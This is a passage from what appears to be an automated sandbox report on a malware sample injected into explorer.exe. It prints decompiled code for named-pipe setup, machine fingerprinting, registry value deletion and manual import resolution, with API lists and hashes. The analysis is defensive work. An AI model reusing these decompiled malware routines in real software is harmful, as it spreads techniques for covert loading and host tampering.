                                          				_t26 =  *0x1001e684; // 0x2e5faa0
                                          				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
                                          				_t28 =  *0x1001e758; // 0x0
                                          				 *0x1001e6ec = 0;
                                          				_t29 =  !=  ? 1 : _t28;
                                          				_t46 =  *0x1001e6f4; // 0x0
                                          				 *0x1001e758 =  !=  ? 1 : _t28;
                                          				E1000A4DB(_t46);
                                          				_t15 = _t61;
                                          				goto L12;
                                          			}

                                          APIs
                                          • GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
                                          • GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
                                          • GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
                                          • DuplicateHandle.KERNEL32 ref: 10001BD9
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Current$Process$DuplicateHandleThread
                                          • String ID:
                                          • API String ID: 3566409357-0
                                          • Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                                          • Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
                                          • Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                                          • Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          C-Code - Quality: 79%
                                          			E000831C2(void* __edx, void* __eflags) {
                                          				CHAR* _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				void* _v20;
                                          				signed int _t10;
                                          				intOrPtr _t11;
                                          				intOrPtr _t12;
                                          				void* _t16;
                                          				intOrPtr _t18;
                                          				intOrPtr _t22;
                                          				intOrPtr _t28;
                                          				void* _t38;
                                          				CHAR* _t40;
                                          
                                          				_t38 = __edx;
                                          				_t28 =  *0x9e688; // 0xb0000
                                          				_t10 = E0008C292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
                                          				_t40 = _t10;
                                          				_v8 = _t40;
                                          				if(_t40 != 0) {
                                          					_t11 = E00088604(0x80000); // executed
                                          					 *0x9e724 = _t11;
                                          					__eflags = _t11;
                                          					if(_t11 != 0) {
                                          						_t12 = E0008BD10(); // executed
                                          						_v16 = _t12;
                                          						__eflags = _t12;
                                          						if(_t12 != 0) {
                                          							_push(0xc);
                                          							_pop(0);
                                          							_v12 = 1;
                                          						}
                                          						_v20 = 0;
                                          						__eflags = 0;
                                          						asm("sbb eax, eax");
                                          						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
                                          						 *0x9e674 = _t16;
                                          						__eflags = _t16 - 0xffffffff;
                                          						if(_t16 != 0xffffffff) {
                                          							E0008BC7A( &_v20, _t38); // executed
                                          							_t18 = E000898EE(E000832A1, 0, __eflags, 0, 0); // executed
                                          							__eflags = _t18;
                                          							if(_t18 != 0) {
                                          								goto L12;
                                          							}
                                          							_t22 =  *0x9e684; // 0x34f8f0
                                          							 *((intOrPtr*)(_t22 + 0x30))( *0x9e674);
                                          							_push(0xfffffffd);
                                          							goto L11;
                                          						} else {
                                          							 *0x9e674 = 0;
                                          							_push(0xfffffffe);
                                          							L11:
                                          							_pop(0);
                                          							L12:
                                          							E0008861A( &_v8, 0xffffffff);
                                          							return 0;
                                          						}
                                          					}
                                          					_push(0xfffffff5);
                                          					goto L11;
                                          				}
                                          				return _t10 | 0xffffffff;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b8e4c99b3068590da576ac944090c7757318e2abd6f1916c3762a3faa55aaa0e
                                          • Instruction ID: 8572b94192bc1e43ddf863f0276067eeaee28e73aa111561e36aea24d5a940c8
                                          • Opcode Fuzzy Hash: b8e4c99b3068590da576ac944090c7757318e2abd6f1916c3762a3faa55aaa0e
                                          • Instruction Fuzzy Hash: 6821C872604211AAEB10FBB9EC45FAE77A8FB95B74F20032AF165D71D1EE3489008751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00085A61(void* __eflags) {
                                          				intOrPtr _t2;
                                          				void* _t6;
                                          				void* _t7;
                                          
                                          				_t2 =  *0x9e684; // 0x34f8f0
                                          				 *((intOrPtr*)(_t2 + 0x108))(1, E00085A06);
                                          				E00085631(_t6, _t7); // executed
                                          				return 0;
                                          			}

                                          APIs
                                          • RtlAddVectoredExceptionHandler.NTDLL(00000001,00085A06,00085CE8), ref: 00085A6D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionHandlerVectored
                                          • String ID:
                                          • API String ID: 3310709589-0
                                          • Opcode ID: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
                                          • Instruction ID: 435aaf7462d5f916828f25a0b113b0bfc22426b62e8c3a1df64e723560edf676
                                          • Opcode Fuzzy Hash: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
                                          • Instruction Fuzzy Hash: 2FB092312509409BD640FB60CC8AEC83290BB20782F4100A072858A0A3DAE048906702
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 79%
                                          			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                                          				char _v516;
                                          				void _v1044;
                                          				char _v1076;
                                          				signed int _v1080;
                                          				signed int _v1096;
                                          				WCHAR* _v1100;
                                          				intOrPtr _v1104;
                                          				signed int _v1108;
                                          				intOrPtr _v1112;
                                          				intOrPtr _v1116;
                                          				char _v1144;
                                          				char _v1148;
                                          				void* __esi;
                                          				intOrPtr _t66;
                                          				intOrPtr _t73;
                                          				signed int _t75;
                                          				intOrPtr _t76;
                                          				signed int _t80;
                                          				signed int _t81;
                                          				WCHAR* _t87;
                                          				void* _t89;
                                          				signed int _t90;
                                          				signed int _t91;
                                          				signed int _t93;
                                          				signed int _t94;
                                          				WCHAR* _t96;
                                          				intOrPtr _t106;
                                          				intOrPtr _t107;
                                          				void* _t108;
                                          				intOrPtr _t109;
                                          				signed char _t116;
                                          				WCHAR* _t118;
                                          				void* _t122;
                                          				signed int _t123;
                                          				intOrPtr _t125;
                                          				void* _t128;
                                          				void* _t129;
                                          				WCHAR* _t130;
                                          				void* _t134;
                                          				void* _t141;
                                          				void* _t143;
                                          				WCHAR* _t145;
                                          				signed int _t153;
                                          				void* _t154;
                                          				void* _t178;
                                          				signed int _t180;
                                          				void* _t181;
                                          				void* _t183;
                                          				void* _t187;
                                          				signed int _t188;
                                          				WCHAR* _t190;
                                          				signed int _t191;
                                          				signed int _t192;
                                          				intOrPtr* _t194;
                                          				signed int _t196;
                                          				void* _t199;
                                          				void* _t200;
                                          				void* _t201;
                                          				void* _t202;
                                          				intOrPtr* _t203;
                                          				void* _t208;
                                          
                                          				_t208 = __fp0;
                                          				_push(_t191);
                                          				_t128 = __edx;
                                          				_t187 = __ecx;
                                          				_t192 = _t191 | 0xffffffff;
                                          				memset( &_v1044, 0, 0x20c);
                                          				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                                          				_v1108 = 1;
                                          				if(_t187 != 0) {
                                          					_t123 =  *0x9e688; // 0xb0000
                                          					_t125 =  *0x9e68c; // 0x34fab8
                                          					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
                                          				}
                                          				if(E0008BB8D(_t187) != 0) {
                                          					L4:
                                          					_t134 = _t128; // executed
                                          					_t66 = E0008B7A8(_t134,  &_v516); // executed
                                          					_push(_t134);
                                          					_v1104 = _t66;
                                          					E0008B67D(_t66,  &_v1076, _t206, _t208);
                                          					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
                                          					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
                                          					E0008B88A(_t141,  &_v1100, _t208);
                                          					_t175 =  &_v1076;
                                          					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208); // executed
                                          					_v1112 = _t73;
                                          					_t143 = _t141;
                                          					if(_t73 != 0) {
                                          						_push(0);
                                          						_push(_t129);
                                          						_push("\\");
                                          						_t130 = E000892E5(_t73);
                                          						_t200 = _t199 + 0x10;
                                          						_t75 =  *0x9e688; // 0xb0000
                                          						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
                                          						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
                                          							L12:
                                          							__eflags = _v1108;
                                          							if(__eflags != 0) {
                                          								_t76 = E000891E3(_v1112);
                                          								_t145 = _t130;
                                          								 *0x9e740 = _t76;
                                          								 *0x9e738 = E000891E3(_t145);
                                          								L17:
                                          								_push(_t145);
                                          								_t80 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
                                          								_t188 = _t80;
                                          								_t201 = _t200 + 0x10;
                                          								__eflags = _t188;
                                          								if(_t188 == 0) {
                                          									goto L41;
                                          								}
                                          								_push(0x9b9ca);
                                          								E00089F48(0xe); // executed
                                          								E00089F6C(_t188, _t208, _t130); // executed
                                          								_t194 = _a4;
                                          								_v1096 = _v1096 & 0x00000000;
                                          								_push(2);
                                          								_v1100 =  *_t194;
                                          								_push(8);
                                          								_push( &_v1100);
                                          								_t178 = 0xb; // executed
                                          								E0008A0AB(_t188, _t178, _t208); // executed
                                          								_t179 =  *(_t194 + 0x10);
                                          								_t202 = _t201 + 0xc;
                                          								__eflags =  *(_t194 + 0x10);
                                          								if( *(_t194 + 0x10) != 0) {
                                          									E0008A3ED(_t188, _t179, _t208);
                                          								}
                                          								_t180 =  *(_t194 + 0xc);
                                          								__eflags = _t180;
                                          								if(_t180 != 0) {
                                          									E0008A3ED(_t188, _t180, _t208); // executed
                                          								}
                                          								_t87 = E0008980C(0);
                                          								_push(2);
                                          								_v1100 = _t87;
                                          								_t153 = _t188;
                                          								_push(8);
                                          								_v1096 = _t180;
                                          								_push( &_v1100);
                                          								_t181 = 2; // executed
                                          								_t89 = E0008A0AB(_t153, _t181, _t208); // executed
                                          								_t203 = _t202 + 0xc;
                                          								__eflags = _v1108;
                                          								if(_v1108 == 0) {
                                          									_t153 =  *0x9e688; // 0xb0000
                                          									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
                                          									if(__eflags != 0) {
                                          										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
                                          										_t203 = _t203 + 0xc;
                                          										goto L26;
                                          									}
                                          									_t153 = _t153 + 0x228;
                                          									goto L25;
                                          								} else {
                                          									_t91 =  *0x9e688; // 0xb0000
                                          									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
                                          									if(__eflags != 0) {
                                          										L32:
                                          										__eflags =  *(_t91 + 0x1898) & 0x00000082;
                                          										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
                                          											_t183 = 0x64;
                                          											E0008E23E(_t183);
                                          										}
                                          										E000852C0( &_v1076, _t208);
                                          										_t190 = _a8;
                                          										_t154 = _t153;
                                          										__eflags = _t190;
                                          										if(_t190 != 0) {
                                          											_t94 =  *0x9e688; // 0xb0000
                                          											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
                                          											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
                                          												lstrcpyW(_t190, _t130);
                                          											} else {
                                          												_t96 = E0008109A(_t154, 0x228);
                                          												_v1100 = _t96;
                                          												lstrcpyW(_t190, _t96);
                                          												E000885D5( &_v1100);
                                          												 *_t203 = "\"";
                                          												lstrcatW(_t190, ??);
                                          												lstrcatW(_t190, _t130);
                                          												lstrcatW(_t190, "\"");
                                          											}
                                          										}
                                          										_t93 = _a12;
                                          										__eflags = _t93;
                                          										if(_t93 != 0) {
                                          											 *_t93 = _v1104;
                                          										}
                                          										_t192 = 0;
                                          										__eflags = 0;
                                          										goto L41;
                                          									}
                                          									_t51 = _t91 + 0x228; // 0xb0228
                                          									_t153 = _t51;
                                          									L25:
                                          									_t90 = E0008553F(_t153, _t130, __eflags);
                                          									L26:
                                          									__eflags = _t90;
                                          									if(_t90 >= 0) {
                                          										_t91 =  *0x9e688; // 0xb0000
                                          										goto L32;
                                          									}
                                          									_push(0xfffffffd);
                                          									L6:
                                          									_pop(_t192);
                                          									goto L41;
                                          								}
                                          							}
                                          							_t106 = E0008C292(_v1104, __eflags);
                                          							_v1112 = _t106;
                                          							_t107 =  *0x9e684; // 0x34f8f0
                                          							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                                          							__eflags = _t108 - _t192;
                                          							if(_t108 != _t192) {
                                          								_t109 =  *0x9e684; // 0x34f8f0
                                          								 *((intOrPtr*)(_t109 + 0x30))();
                                          								E0008861A( &_v1148, _t192);
                                          								_t145 = _t108;
                                          								goto L17;
                                          							}
                                          							E0008861A( &_v1144, _t192);
                                          							_t81 = 1;
                                          							goto L42;
                                          						}
                                          						_t116 =  *(_t75 + 0x1898);
                                          						__eflags = _t116 & 0x00000004;
                                          						if((_t116 & 0x00000004) == 0) {
                                          							__eflags = _t116;
                                          							if(_t116 != 0) {
                                          								goto L12;
                                          							}
                                          							L11:
                                          							E0008E286(_v1112, _t175);
                                          							goto L12;
                                          						}
                                          						_v1080 = _v1080 & 0x00000000;
                                          						_t118 = E000895E1(_t143, 0x879);
                                          						_v1100 = _t118;
                                          						_t175 = _t118;
                                          						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                                          						E000885D5( &_v1100);
                                          						_t200 = _t200 + 0x14;
                                          						goto L11;
                                          					}
                                          					_push(0xfffffffe);
                                          					goto L6;
                                          				} else {
                                          					_t122 = E00082BA4( &_v1044, _t192, 0x105); // executed
                                          					_t206 = _t122;
                                          					if(_t122 == 0) {
                                          						L41:
                                          						_t81 = _t192;
                                          						L42:
                                          						return _t81;
                                          					}
                                          					goto L4;
                                          				}
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$memset
                                          • String ID:
                                          • API String ID: 1985475764-0
                                          • Opcode ID: a5dc98278c51056b20f5ad4c48acfda892f66f4e91ce1b005a64c70370a8f86c
                                          • Instruction ID: dec47ca1d8cbe9d9e50b353cb195f6a6744e81453b5205875f33d8479ea457cb
                                          • Opcode Fuzzy Hash: a5dc98278c51056b20f5ad4c48acfda892f66f4e91ce1b005a64c70370a8f86c
                                          • Instruction Fuzzy Hash: FC919E71604302AFE754FB24DC86FBA73E9BB84720F14452EF5958B292EB74DD048B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E0008B7A8(WCHAR* __ecx, void* __edx) {
                                          				long _v8;
                                          				long _v12;
                                          				WCHAR* _v16;
                                          				short _v528;
                                          				short _v1040;
                                          				short _v1552;
                                          				WCHAR* _t27;
                                          				signed int _t29;
                                          				void* _t33;
                                          				long _t38;
                                          				WCHAR* _t43;
                                          				WCHAR* _t56;
                                          
                                          				_t44 = __ecx;
                                          				_v8 = _v8 & 0x00000000;
                                          				_t43 = __edx;
                                          				_t56 = __ecx;
                                          				memset(__edx, 0, 0x100);
                                          				_v12 = 0x100;
                                          				GetComputerNameW( &_v528,  &_v12);
                                          				lstrcpynW(_t43,  &_v528, 0x100);
                                          				_t27 = E000895E1(_t44, 0xa88);
                                          				_v16 = _t27;
                                          				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                          				asm("sbb eax, eax");
                                          				_v8 = _v8 &  ~_t29;
                                          				E000885D5( &_v16);
                                          				_t33 = E0008C392(_t43);
                                          				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
                                          				lstrcatW(_t43, _t56);
                                          				_t38 = E0008C392(_t43);
                                          				_v12 = _t38;
                                          				CharUpperBuffW(_t43, _t38);
                                          				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 0008B7C5
                                          • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 0008B7E0
                                          • lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF
                                          • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0008B821
                                            • Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D
                                          • lstrcatW.KERNEL32 ref: 0008B85A
                                          • CharUpperBuffW.USER32(?,00000000), ref: 0008B86C
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                          • String ID:
                                          • API String ID: 3410906232-0
                                          • Opcode ID: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                                          • Instruction ID: 8115248732dee6e15747b0cfab76d271734f3ac179cb7c14a2a6e9e989f043a1
                                          • Opcode Fuzzy Hash: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                                          • Instruction Fuzzy Hash: F82156B2A00214BFE714BBA4DC4AFEE77BCFB85310F108566B505E6182EE755F088B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 123 861b4-861f9 memset call 88604 126 861ff-86211 call 88604 123->126 127 86363-86369 123->127 126->127 130 86217-86234 RegOpenKeyExW 126->130 131 8623a-8626d 130->131 132 86333-86337 130->132 138 8627f-86284 131->138 139 8626f-8627a 131->139 133 86339-86341 RegCloseKey 132->133 134 86344-8635b call 8861a * 2 132->134 133->134 142 86360 134->142 138->132 141 8628a 138->141 139->132 144 8628d-862dc memset * 2 141->144 142->127 146 862de-862ee 144->146 147 86326-8632d 144->147 149 862f0-86304 146->149 150 86323 146->150 147->132 147->144 149->150 152 86306-86313 call 8c392 149->152 150->147 155 8631c-8631e call 8b1b1 152->155 156 86315-86317 152->156 155->150 156->155
                                          C-Code - Quality: 80%
                                          			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				void* _v8;
                                          				int _v12;
                                          				int _v16;
                                          				int _v20;
                                          				char _v24;
                                          				char _v28;
                                          				void* _v32;
                                          				void* _v36;
                                          				char _v40;
                                          				char _v44;
                                          				char _v48;
                                          				char _v56;
                                          				void _v576;
                                          				void* _t53;
                                          				intOrPtr _t72;
                                          				intOrPtr _t80;
                                          				intOrPtr _t81;
                                          				intOrPtr _t82;
                                          				signed int _t85;
                                          				intOrPtr _t87;
                                          				int _t89;
                                          				intOrPtr _t90;
                                          				intOrPtr _t92;
                                          				void* _t96;
                                          				void* _t97;
                                          				void* _t98;
                                          				void* _t99;
                                          				void* _t100;
                                          				void* _t108;
                                          
                                          				_t108 = __fp0;
                                          				_t96 = __edx;
                                          				_t89 = 0;
                                          				_v8 = 0;
                                          				memset( &_v576, 0, 0x208);
                                          				_v28 = 0x104;
                                          				_v20 = 0x3fff;
                                          				_v16 = 0;
                                          				_t53 = E00088604(0x3fff); // executed
                                          				_t98 = _t53;
                                          				_t100 = _t99 + 0x10;
                                          				_v32 = _t98;
                                          				if(_t98 == 0) {
                                          					L18:
                                          					return 0;
                                          				}
                                          				_t97 = E00088604(0x800);
                                          				_v36 = _t97;
                                          				if(_t97 == 0) {
                                          					goto L18;
                                          				}
                                          				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
                                          					L15:
                                          					if(_v8 != 0) {
                                          						RegCloseKey(_v8);
                                          					}
                                          					E0008861A( &_v32, 0x3fff); // executed
                                          					E0008861A( &_v36, 0x800); // executed
                                          					goto L18;
                                          				}
                                          				_push( &_v56);
                                          				_push( &_v40);
                                          				_push( &_v44);
                                          				_push( &_v48);
                                          				_push( &_v24);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_push( &_v28);
                                          				_push( &_v576);
                                          				_t72 =  *0x9e68c; // 0x34fab8
                                          				_push(_v8);
                                          				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
                                          					__eflags = _v24;
                                          					if(_v24 == 0) {
                                          						goto L15;
                                          					}
                                          					_v12 = 0;
                                          					do {
                                          						memset(_t97, 0, 0x800);
                                          						memset(_t98, 0, 0x3fff);
                                          						_t100 = _t100 + 0x18;
                                          						_v20 = 0x3fff;
                                          						_v16 = 0x800;
                                          						 *_t98 = 0;
                                          						_t80 =  *0x9e68c; // 0x34fab8
                                          						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
                                          						__eflags = _t81;
                                          						if(_t81 == 0) {
                                          							_t82 =  *0x9e690; // 0x34fb90
                                          							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
                                          							__eflags = _t90;
                                          							if(_t90 != 0) {
                                          								_t92 =  *0x9e68c; // 0x34fab8
                                          								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
                                          								__eflags = _a16;
                                          								if(_a16 != 0) {
                                          									_t85 = E0008C392(_t90);
                                          									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
                                          									if(__eflags == 0) {
                                          										__eflags = 0;
                                          										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
                                          									}
                                          									E0008B1B1(_t90, _t96, __eflags, _t108);
                                          								}
                                          							}
                                          							_t89 = _v12;
                                          						}
                                          						_t89 = _t89 + 1;
                                          						_v12 = _t89;
                                          						__eflags = _t89 - _v24;
                                          					} while (_t89 < _v24);
                                          					goto L15;
                                          				}
                                          				_t87 =  *0x9e68c; // 0x34fab8
                                          				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
                                          				goto L15;
                                          			}

































                                          APIs
                                          • memset.MSVCRT ref: 000861D2
                                            • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                          • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
                                          • memset.MSVCRT ref: 00086295
                                          • memset.MSVCRT ref: 000862A2
                                          • RegCloseKey.KERNEL32(00000000,?,?,00000001), ref: 00086341
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset$AllocateCloseHeapOpen
                                          • String ID:
                                          • API String ID: 1886988140-0
                                          • Opcode ID: 93ce28d5d0d56b15f8c62ba43f04e9097e84cfe134075291ab19f69f0add594f
                                          • Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
                                          • Opcode Fuzzy Hash: 93ce28d5d0d56b15f8c62ba43f04e9097e84cfe134075291ab19f69f0add594f
                                          • Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 94%
                                          			E0008CF84(void* __ecx) {
                                          				intOrPtr _t11;
                                          				long _t12;
                                          				intOrPtr _t17;
                                          				intOrPtr _t18;
                                          				struct _OSVERSIONINFOA* _t29;
                                          
                                          				_push(__ecx);
                                          				_t29 =  *0x9e688; // 0xb0000
                                          				GetCurrentProcess();
                                          				_t11 = E0008BA05(); // executed
                                          				_t1 = _t29 + 0x1644; // 0xb1644
                                          				_t25 = _t1;
                                          				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                                          				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                                          				_t33 = _t12;
                                          				if(_t12 != 0) {
                                          					_t12 = E00088FBE(_t25, _t33);
                                          				}
                                          				_t3 = _t29 + 0x228; // 0xb0228
                                          				 *(_t29 + 0x1854) = _t12;
                                          				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
                                          				memset(_t29, 0, 0x9c);
                                          				_t29->dwOSVersionInfoSize = 0x9c;
                                          				GetVersionExA(_t29);
                                          				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                                          				_t17 = E0008E3B6(_t3);
                                          				_t7 = _t29 + 0x220; // 0xb0220
                                          				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                                          				_t18 = E0008E3F1(_t7); // executed
                                          				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                                          				return _t18;
                                          			}









                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                                          • GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                                          • memset.MSVCRT ref: 0008CFE2
                                          • GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                                          • GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentProcess$FileModuleNameVersionmemset
                                          • String ID:
                                          • API String ID: 3581039275-0
                                          • Opcode ID: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                                          • Instruction ID: 1cd3ccc896d32ed381cc1e7efd68f96a46d511454c8c9de3dc1a9453bb6438f5
                                          • Opcode Fuzzy Hash: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                                          • Instruction Fuzzy Hash: C4015E70901700ABE720BF70D84AADAB7E5FF85310F04082EF59683292EF746545CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 170 9249b-924a9 171 924ab-924ae 170->171 172 924b3-924f3 GetModuleHandleA call 8e099 170->172 173 92660-92661 171->173 176 924f9-92510 172->176 177 9265e 172->177 178 92513-9251a 176->178 177->173 179 9251c-92525 178->179 180 92527-92537 178->180 179->178 181 9253a-92541 180->181 181->177 182 92547-9255e LoadLibraryA 181->182 183 92568-9256e 182->183 184 92560-92563 182->184 185 9257d-92586 183->185 186 92570-9257b 183->186 184->173 187 92589 185->187 186->187 188 9258d-92593 187->188 189 92599-925b1 188->189 190 92650-92659 188->190 191 925b3-925d2 189->191 192 925d4-92602 189->192 190->181 195 92605-9260b 191->195 192->195 196 92639-9264b 195->196 197 9260d-9261b 195->197 196->188 198 9261d-9262f 197->198 199 92631-92637 197->199 198->196 199->196
                                          C-Code - Quality: 50%
                                          			E0009249B(signed int __eax, intOrPtr _a4) {
                                          				intOrPtr* _v8;
                                          				signed int* _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				intOrPtr _v32;
                                          				struct HINSTANCE__* _v36;
                                          				intOrPtr _v40;
                                          				signed int _v44;
                                          				struct HINSTANCE__* _v48;
                                          				intOrPtr _v52;
                                          				signed int _v56;
                                          				intOrPtr _v60;
                                          				signed int _v64;
                                          				signed int _t109;
                                          				signed int _t112;
                                          				signed int _t115;
                                          				struct HINSTANCE__* _t121;
                                          				void* _t163;
                                          
                                          				_v44 = _v44 & 0x00000000;
                                          				if(_a4 != 0) {
                                          					_v48 = GetModuleHandleA("kernel32.dll");
                                          					_v40 = E0008E099(_v48, "GetProcAddress");
                                          					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                          					_v32 = _v52;
                                          					_t109 = 8;
                                          					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                          						L24:
                                          						return 0;
                                          					}
                                          					_v56 = 0x80000000;
                                          					_t112 = 8;
                                          					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                          					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                          						_v8 = _v8 + 0x14;
                                          					}
                                          					_t115 = 8;
